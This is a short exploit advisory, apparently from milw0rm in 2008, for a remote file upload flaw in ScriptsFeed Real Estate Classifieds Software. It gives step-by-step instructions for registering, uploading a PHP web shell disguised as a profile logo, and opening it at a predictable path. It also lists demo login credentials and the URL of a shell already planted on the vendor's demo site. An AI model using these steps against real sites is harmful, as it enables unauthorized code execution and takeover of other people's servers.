65 lines
No EOL
1.3 KiB
Text
65 lines
No EOL
1.3 KiB
Text
[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
|
|
[~]
|
|
[~] ----------------------------------------------------------
|
|
[~] Discovered By: ZoRLu
|
|
[~]
|
|
[~] Date: 13.11.2008
|
|
[~]
|
|
[~] Home: www.z0rlu.blogspot.com
|
|
[~]
|
|
[~] contact: trt-turk@hotmail.com
|
|
[~]
|
|
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
|
|
[~]
|
|
[~] my bug number now: 39
|
|
[~]
|
|
[~] my target bug number: 100
|
|
[~]
|
|
[~] -----------------------------------------------------------
|
|
|
|
|
|
Exploit:
|
|
|
|
http://localhost/script/re_images/[id]_logo_your_shell.php
|
|
|
|
you register to site
|
|
|
|
register: http://localhost/script/register.php
|
|
|
|
after you login to site
|
|
|
|
login: http://localhost/script/login.php
|
|
|
|
more after you go profile edit
|
|
|
|
profile: http://localhost/script/profile.php
|
|
|
|
and you upload your_shell.php right click to your logo and select properties copy link
|
|
|
|
paste your explorer go your_shell.php
|
|
|
|
your_shell.php path:
|
|
|
|
http://localhost/script/re_images/[id]_logo_your_shell.php
|
|
|
|
|
|
|
|
rfu for demo:
|
|
|
|
user: zorlu
|
|
|
|
passwd: zorlu1
|
|
|
|
shell path:
|
|
|
|
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
|
|
|
|
|
|
[~]----------------------------------------------------------------------
|
|
[~] Greetz tO: str0ke & all Muslim HaCkeRs
|
|
[~]
|
|
[~] yildirimordulari.org & darkc0de.com
|
|
[~]
|
|
[~]----------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-11-13] |